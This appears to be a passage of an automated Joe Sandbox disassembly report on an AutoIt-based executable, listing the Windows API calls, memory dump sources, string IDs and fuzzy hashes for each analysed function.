                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00488774
                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0048878B
                                                              • FreeSid.ADVAPI32(?), ref: 0048879B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                              • String ID:
                                                              • API String ID: 3429775523-0
                                                              • Opcode ID: 386ceebf5b5a27f8f372b48027186c2ba5ab66a2918bc483bd29f37b3549962c
                                                              • Instruction ID: e367b31ae513eb1ebf8fbe74008512d53d981ee92f636ef93e22fb0967879789
                                                              • Opcode Fuzzy Hash: 386ceebf5b5a27f8f372b48027186c2ba5ab66a2918bc483bd29f37b3549962c
                                                              • Instruction Fuzzy Hash: 90F04F7595130CBFDF00DFF4DC89AAEB7BCEF08201F504579A505E2191D6756A488B54
                                                              APIs
                                                              • __time64.LIBCMT ref: 0049889B
                                                                • Part of subcall function 0045520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00498F6E,00000000,?,?,?,?,0049911F,00000000,?), ref: 00455213
                                                                • Part of subcall function 0045520A: __aulldiv.LIBCMT ref: 00455233
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                              • String ID: 0eO
                                                              • API String ID: 2893107130-633601889
                                                              • Opcode ID: 87a85016b41be3342b1ea848f0d837c71bf747edc38200afd93f0f845cf9d770
                                                              • Instruction ID: 322450015eccb100fb1152b0f8b4275a8a9636f91a9386166dc1aea2a12f82a7
                                                              • Opcode Fuzzy Hash: 87a85016b41be3342b1ea848f0d837c71bf747edc38200afd93f0f845cf9d770
                                                              • Instruction Fuzzy Hash: 7521B4326355108BC729CF29D841A62B7E1EFA5311B698E7DD1F5CB2D0CB34B905CB58
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0049C6FB
                                                              • FindClose.KERNEL32(00000000), ref: 0049C72B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 4e51ee8064c0f90d3612b502c40801a4b426e762f04c7ae9d056d0d996c1f545
                                                              • Instruction ID: 052eea4fec4336a2f994dad91ef24d4591c447ea34191900e320a19b3586a6a2
                                                              • Opcode Fuzzy Hash: 4e51ee8064c0f90d3612b502c40801a4b426e762f04c7ae9d056d0d996c1f545
                                                              • Instruction Fuzzy Hash: B01182716102009FDB14EF29D88592AF7E4EF85324F00856EF8A987290DB74AC05CF85
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,004A9468,?,004BFB84,?), ref: 0049A097
                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,004A9468,?,004BFB84,?), ref: 0049A0A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: 38ac3e07880e6ab55a1db55ad630cc7dd8657f35acc07b4e4a0a100d79fc0d61
                                                              • Instruction ID: 013f2d71780aecbc309f99a3b5abb5da711d41590e65d135f7e38b9e7669746a
                                                              • Opcode Fuzzy Hash: 38ac3e07880e6ab55a1db55ad630cc7dd8657f35acc07b4e4a0a100d79fc0d61
                                                              • Instruction Fuzzy Hash: 00F0823510522DABDB219FA4CC48FEA77ACBF08361F00426AF909D7291D6349954CBE6
                                                              APIs
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00488309), ref: 004881E0
                                                              • CloseHandle.KERNEL32(?,?,00488309), ref: 004881F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                              • String ID:
                                                              • API String ID: 81990902-0
                                                              • Opcode ID: 1405de41f549aaf5185613901148e4f9c7815b8dea8035f796c0d3cfb0d03e62
                                                              • Instruction ID: c39ba2021f9f491ffd5f223a72ff11f164aaf03953ac32fadb0d8706cd46c1de
                                                              • Opcode Fuzzy Hash: 1405de41f549aaf5185613901148e4f9c7815b8dea8035f796c0d3cfb0d03e62
                                                              • Instruction Fuzzy Hash: A1E08C32010611AFE7212B21EC09D7B7BEAEF04315724893EF8AA80431CB22AC94DB18
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00458D57,?,?,?,00000001), ref: 0045A15A
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0045A163
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 3e9d539b575c0c63c9de12c45c5682115cb5ec51b70c8cbcfea6a0a816f17b34
                                                              • Instruction ID: a075d9e47cbb1835aac0b86d1db2a18de91b7f17087bed901930b20f7181ddee
                                                              • Opcode Fuzzy Hash: 3e9d539b575c0c63c9de12c45c5682115cb5ec51b70c8cbcfea6a0a816f17b34
                                                              • Instruction Fuzzy Hash: F8B09231054208ABCA002B91EC09B883FA8EB54AA2F409130FA0E84C60CB6254548A99
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a067cf7fe18c78231ac75fe64c90add8491e9684d62f466b3a83a1279aeaeaf
                                                              • Instruction ID: 2a75325ba9bd5515e2c22bc6bed21b5331c8d2a43d786c067f5b3d5b0a40a215
                                                              • Opcode Fuzzy Hash: 1a067cf7fe18c78231ac75fe64c90add8491e9684d62f466b3a83a1279aeaeaf
                                                              • Instruction Fuzzy Hash: EB324661D29F014ED7639634D832336A248AFB73C9F14D737FC19B5AA6EB28D8874109
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb839485504853003e39333346b6d179682e3f12be758fa0e3c188e027fd3139
                                                              • Instruction ID: 4ec43e41a5ed58355e6c5631dc69b7af3b9f9edafac0459d835274f60a3dc232
                                                              • Opcode Fuzzy Hash: fb839485504853003e39333346b6d179682e3f12be758fa0e3c188e027fd3139
                                                              • Instruction Fuzzy Hash: FDB12030E2AF454DD36396398935336BA4CAFBB2C9F51D72BFC2670D22EB2185934145
                                                              APIs
                                                              • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00494C76
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: mouse_event
                                                              • String ID:
                                                              • API String ID: 2434400541-0
                                                              • Opcode ID: 199f9fc8e044cc8a9bb3ef738b75ef0820a12614c89c48681c31e997b1fd66c5
                                                              • Instruction ID: 3edbb597b197f9bc0689ca2e3291a3d5e6c1cd43ab9d48e4bb8910a0055e2f98
                                                              • Opcode Fuzzy Hash: 199f9fc8e044cc8a9bb3ef738b75ef0820a12614c89c48681c31e997b1fd66c5
                                                              • Instruction Fuzzy Hash: 75D05EA012220A3DECA80720CD5FFBB1909E3C0795F86C17B7241952C1E8DC6803A03D
                                                              APIs
                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00488389), ref: 004887D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: LogonUser
                                                              • String ID:
                                                              • API String ID: 1244722697-0
                                                              • Opcode ID: 8824dc4b7df1e353a1dcbbb959f6b633c2cfd80876bfaeaf3fa433245804c441
                                                              • Instruction ID: 1d00d46061c686e3f10d267c637dd3566d94da0f4c3f757cb04711a123e74e3a
                                                              • Opcode Fuzzy Hash: 8824dc4b7df1e353a1dcbbb959f6b633c2cfd80876bfaeaf3fa433245804c441
                                                              • Instruction Fuzzy Hash: 08D05E3226050EABEF019EA4DC02EAE3B69EB04B01F408121FE15C50A1C775E835AB60
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0045A12A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 833e008c856389094ed8f7b625b265ee6fbd632d459089db0fbe85a7aad122aa
                                                              • Instruction ID: 07c3cf51378e8e2cb391969c7cf96deda484a3edf4a1a4d3a50dbbef239d57a8
                                                              • Opcode Fuzzy Hash: 833e008c856389094ed8f7b625b265ee6fbd632d459089db0fbe85a7aad122aa
                                                              • Instruction Fuzzy Hash: EDA0113000020CAB8A002B82EC08888BFACEA002A0B008030F80E808228B32A8208A88
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 413dd36d905b2f0ed312ba02c1d044cec4ec28d8e6b712eb562a6ee50bbd68a2
                                                              • Instruction ID: 16e6ecc3f3a490f6546d3eb96cec47fdd0950cb5658ed1af10714e3e8864bd24
                                                              • Opcode Fuzzy Hash: 413dd36d905b2f0ed312ba02c1d044cec4ec28d8e6b712eb562a6ee50bbd68a2
                                                              • Instruction Fuzzy Hash: 87224730904546CBEF389A64C49477E77A1FB41304F28886FD9429B692DFBC9D92CB4E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                              • Instruction ID: a657e96a5fd69ee023ba3b57fe23091c84aa4d742d73d5aece2d39dcdc14b80a
                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                              • Instruction Fuzzy Hash: 2EC194322050930ADB2D4639853413FBAA15EA37B371A075FDCB3CB2D6EE18D92DD624
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                              • Instruction ID: 5298415ba48e282cbcbfdb2a03570802c99161a43fed6e2753e21ff239c1f2ed
                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                              • Instruction Fuzzy Hash: DAC1C6322050930ADF2D4639853413FBAA15EA37B271A075FDCB2DB2D6EE18D92DD624
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction ID: 1c905a688ab3d13a7d57946aa2942c1e622466bf09cdbddc61faca874ff65930
                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction Fuzzy Hash: 9AC1753220519309DF2D4639847423FBAA15EA27B331A075FDCB3CB2E6EE18D96DD614
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 004A785B
                                                              • DeleteObject.GDI32(00000000), ref: 004A786D
                                                              • DestroyWindow.USER32 ref: 004A787B
                                                              • GetDesktopWindow.USER32 ref: 004A7895
                                                              • GetWindowRect.USER32(00000000), ref: 004A789C
                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004A79DD
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004A79ED
                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7A35
                                                              • GetClientRect.USER32(00000000,?), ref: 004A7A41
                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004A7A7B
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7A9D
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7AB0
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7ABB
                                                              • GlobalLock.KERNEL32(00000000), ref: 004A7AC4
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7AD3
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004A7ADC
                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7AE3
                                                              • GlobalFree.KERNEL32(00000000), ref: 004A7AEE
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7B00
                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,004C2CAC,00000000), ref: 004A7B16
                                                              • GlobalFree.KERNEL32(00000000), ref: 004A7B26
                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 004A7B4C
                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 004A7B6B
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7B8D
                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7D7A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                              • API String ID: 2211948467-2373415609
                                                              • Opcode ID: d0ef7831147f409728552efc82b7c8db152d594602f7e342455dfe7a3720dc30
                                                              • Instruction ID: 9d174577acfaf846f0efef7d241e86aaf4933d77a7443e79a57ad5e0aacdee0b
                                                              • Opcode Fuzzy Hash: d0ef7831147f409728552efc82b7c8db152d594602f7e342455dfe7a3720dc30
                                                              • Instruction Fuzzy Hash: 68027071900105EFDB14DFA8DC89EAE7BB9FF49314F10426AF905AB2A1C774AD05CB68
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,004BF910), ref: 004B3627
                                                              • IsWindowVisible.USER32(?), ref: 004B364B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpperVisibleWindow
                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                              • API String ID: 4105515805-45149045
                                                              • Opcode ID: 37b6da3ef58ba0dec24ea2a0c796960bfde3353040a3548432e562c00bc78da5
                                                              • Instruction ID: 0b268240c946aad4d7549058dc85b8d51b002f049c8d1aea90deeab0cead7edd
                                                              • Opcode Fuzzy Hash: 37b6da3ef58ba0dec24ea2a0c796960bfde3353040a3548432e562c00bc78da5
                                                              • Instruction Fuzzy Hash: 43D171742043019BCB14EF12C451AAE77A1AF95349F14885FF8855B3E3DB39EE0ACB5A
                                                              APIs
                                                              • SetTextColor.GDI32(?,00000000), ref: 004BA630
                                                              • GetSysColorBrush.USER32(0000000F), ref: 004BA661
                                                              • GetSysColor.USER32(0000000F), ref: 004BA66D
                                                              • SetBkColor.GDI32(?,000000FF), ref: 004BA687
                                                              • SelectObject.GDI32(?,00000000), ref: 004BA696
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004BA6C1
                                                              • GetSysColor.USER32(00000010), ref: 004BA6C9
                                                              • CreateSolidBrush.GDI32(00000000), ref: 004BA6D0
